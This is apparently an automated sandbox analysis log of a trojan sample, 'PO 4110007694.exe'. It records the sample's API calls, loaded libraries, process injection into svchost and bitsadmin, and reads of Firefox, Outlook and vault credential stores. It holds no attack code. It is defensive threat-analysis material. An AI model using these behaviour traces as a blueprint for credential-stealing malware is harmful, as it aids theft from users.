                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AF0 NtWriteFile,1_2_03672AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AD0 NtReadFile,1_2_03672AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AB0 NtWaitForSingleObject,1_2_03672AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F60 NtCreateProcessEx,1_2_03672F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F30 NtCreateSection,1_2_03672F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FE0 NtCreateFile,1_2_03672FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FA0 NtQuerySection,1_2_03672FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FB0 NtResumeThread,1_2_03672FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F90 NtProtectVirtualMemory,1_2_03672F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672E30 NtWriteVirtualMemory,1_2_03672E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672EE0 NtQueueApcThread,1_2_03672EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672EA0 NtAdjustPrivilegesToken,1_2_03672EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672E80 NtReadVirtualMemory,1_2_03672E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D30 NtUnmapViewOfSection,1_2_03672D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D00 NtSetInformationFile,1_2_03672D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D10 NtMapViewOfSection,1_2_03672D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DD0 NtDelayExecution,1_2_03672DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DB0 NtEnumerateKey,1_2_03672DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C60 NtCreateKey,1_2_03672C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C70 NtFreeVirtualMemory,1_2_03672C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C00 NtQueryInformationProcess,1_2_03672C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CF0 NtOpenProcess,1_2_03672CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CC0 NtQueryVirtualMemory,1_2_03672CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CA0 NtQueryInformationToken,1_2_03672CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673010 NtOpenDirectoryObject,1_2_03673010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673090 NtSetValueKey,1_2_03673090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036739B0 NtGetContextThread,1_2_036739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673D70 NtOpenThread,1_2_03673D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673D10 NtOpenProcessToken,1_2_03673D10
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D4340 NtSetContextThread,LdrInitializeThunk,4_2_034D4340
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D4650 NtSuspendThread,LdrInitializeThunk,4_2_034D4650
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2B60 NtClose,LdrInitializeThunk,4_2_034D2B60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2BE0 NtQueryValueKey,LdrInitializeThunk,4_2_034D2BE0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_034D2BF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_034D2BA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2AD0 NtReadFile,LdrInitializeThunk,4_2_034D2AD0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2AF0 NtWriteFile,LdrInitializeThunk,4_2_034D2AF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2F30 NtCreateSection,LdrInitializeThunk,4_2_034D2F30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2FE0 NtCreateFile,LdrInitializeThunk,4_2_034D2FE0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2FB0 NtResumeThread,LdrInitializeThunk,4_2_034D2FB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2EE0 NtQueueApcThread,LdrInitializeThunk,4_2_034D2EE0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_034D2E80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_034D2D10
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_034D2D30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2DD0 NtDelayExecution,LdrInitializeThunk,4_2_034D2DD0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_034D2DF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2C60 NtCreateKey,LdrInitializeThunk,4_2_034D2C60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_034D2C70
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_034D2CA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D35C0 NtCreateMutant,LdrInitializeThunk,4_2_034D35C0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D39B0 NtGetContextThread,LdrInitializeThunk,4_2_034D39B0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2B80 NtQueryInformationFile,4_2_034D2B80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2AB0 NtWaitForSingleObject,4_2_034D2AB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2F60 NtCreateProcessEx,4_2_034D2F60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2F90 NtProtectVirtualMemory,4_2_034D2F90
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2FA0 NtQuerySection,4_2_034D2FA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2E30 NtWriteVirtualMemory,4_2_034D2E30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2EA0 NtAdjustPrivilegesToken,4_2_034D2EA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2D00 NtSetInformationFile,4_2_034D2D00
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2DB0 NtEnumerateKey,4_2_034D2DB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2C00 NtQueryInformationProcess,4_2_034D2C00
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2CC0 NtQueryVirtualMemory,4_2_034D2CC0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D2CF0 NtOpenProcess,4_2_034D2CF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D3010 NtOpenDirectoryObject,4_2_034D3010
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D3090 NtSetValueKey,4_2_034D3090
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D3D70 NtOpenThread,4_2_034D3D70
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D3D10 NtOpenProcessToken,4_2_034D3D10
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02BA9220 NtCreateFile,4_2_02BA9220
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02BA9390 NtReadFile,4_2_02BA9390
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02BA9690 NtAllocateVirtualMemory,4_2_02BA9690
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02BA9480 NtDeleteFile,4_2_02BA9480
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02BA9520 NtClose,4_2_02BA9520
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00C7A1EF
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C68310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C68310
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C751BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00C751BD
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C3D9750_2_00C3D975
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C321C50_2_00C321C5
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C462D20_2_00C462D2
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C903DA0_2_00C903DA
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C4242E0_2_00C4242E
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C325FA0_2_00C325FA
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C266E10_2_00C266E1
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C1E6A00_2_00C1E6A0
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C6E6160_2_00C6E616
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C4878F0_2_00C4878F
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C788890_2_00C78889
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C468440_2_00C46844
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C908570_2_00C90857
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C288080_2_00C28808
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C3CB210_2_00C3CB21
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C46DB60_2_00C46DB6
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C26F9E0_2_00C26F9E
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C230300_2_00C23030
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C3F1D90_2_00C3F1D9
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C331870_2_00C33187
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C112870_2_00C11287
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C314840_2_00C31484
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C255200_2_00C25520
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C376960_2_00C37696
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C257600_2_00C25760
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C319780_2_00C31978
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C49AB50_2_00C49AB5
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C1FCE00_2_00C1FCE0
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C97DDB0_2_00C97DDB
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C31D900_2_00C31D90
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C3BDA60_2_00C3BDA6
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C23FE00_2_00C23FE0
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C1DF000_2_00C1DF00
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_017E22E00_2_017E22E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004189931_2_00418993
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401ACB1_2_00401ACB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042F0B31_2_0042F0B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004101D31_2_004101D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004032F01_2_004032F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402A901_2_00402A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E3D31_2_0040E3D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004103F31_2_004103F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416B8E1_2_00416B8E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416B931_2_00416B93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401C401_2_00401C40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401C3A1_2_00401C3A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E51C1_2_0040E51C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E5231_2_0040E523
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402E491_2_00402E49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402E501_2_00402E50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402F191_2_00402F19
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004027201_2_00402720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA3521_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F01_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037003E61_2_037003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E02741_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C02C01_2_036C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C81581_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036301001_2_03630100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA1181_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F81CC1_2_036F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F41A21_2_036F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037001AA1_2_037001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D20001_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036407701_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036647501_2_03664750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363C7C01_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365C6E01_2_0365C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036405351_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037005911_2_03700591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F24461_2_036F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E44201_2_036E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EE4F61_2_036EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FAB401_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F6BD71_2_036F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA801_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036569621_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A01_2_036429A0
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: String function: 034E7E54 appears 107 times
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: String function: 0351F290 appears 103 times
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: String function: 0348B970 appears 262 times
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: String function: 0350EA12 appears 86 times
Source: C:\Windows\SysWOW64\bitsadmin.exe | Code function: String function: 034D5130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03675130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 036BF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 036AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0362B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03687E54 appears 107 times
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: String function: 00C17DE1 appears 36 times
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: String function: 00C30AE3 appears 70 times
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: String function: 00C38900 appears 42 times
Source: PO 4110007694.exe, 00000000.00000003.1654874711.00000000042B3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO 4110007694.exe
Source: PO 4110007694.exe, 00000000.00000003.1654212049.000000000445D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO 4110007694.exe
Source: PO 4110007694.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@22/13
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C7A06A GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C681CB AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C687E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C7B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C8EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C7C397 CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C14E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\PO 4110007694.exe | File created: C:\Users\user\AppData\Local\Temp\aut5BE6.tmp
Source: PO 4110007694.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\PO 4110007694.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: bitsadmin.exe, 00000004.00000003.2066693761.0000000002F57000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000003.2066566608.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000002.4113859069.0000000002F57000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: PO 4110007694.exe | ReversingLabs: Detection: 39%
Source: unknown | Process created: C:\Users\user\Desktop\PO 4110007694.exe "C:\Users\user\Desktop\PO 4110007694.exe"
Source: C:\Users\user\Desktop\PO 4110007694.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO 4110007694.exe"
Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe | Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"
Source: C:\Windows\SysWOW64\bitsadmin.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PO 4110007694.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\PO 4110007694.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\PO 4110007694.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\PO 4110007694.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\PO 4110007694.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\PO 4110007694.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\PO 4110007694.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\PO 4110007694.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\PO 4110007694.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\PO 4110007694.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\PO 4110007694.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\PO 4110007694.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Windows\SysWOW64\bitsadmin.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: PO 4110007694.exe | Static file information: File size 1212928 > 1048576
Source: PO 4110007694.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PO 4110007694.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PO 4110007694.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PO 4110007694.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PO 4110007694.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PO 4110007694.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: PO 4110007694.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: bitsadmin.pdb source: svchost.exe, 00000001.00000003.1851384519.0000000003048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1851083063.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000002.00000003.2206906784.000000000114B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000001.00000003.1851384519.0000000003048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1851083063.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000002.00000003.2206906784.000000000114B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hLRGQqcplWvpUw.exe, 00000002.00000000.1806902391.0000000000A0E000.00000002.00000001.01000000.00000004.sdmp, hLRGQqcplWvpUw.exe, 00000007.00000002.4113682145.0000000000A0E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO 4110007694.exe, 00000000.00000003.1654212049.0000000004330000.00000004.00001000.00020000.00000000.sdmp, PO 4110007694.exe, 00000000.00000003.1655277180.0000000004190000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885175083.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885175083.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1787377160.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1785653009.0000000003200000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000003.1887433668.000000000310A000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000003.1891223463.00000000032B1000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000002.4114989929.00000000035FE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000002.4114989929.0000000003460000.00000040.00001000.00020000.00000000.sdmp
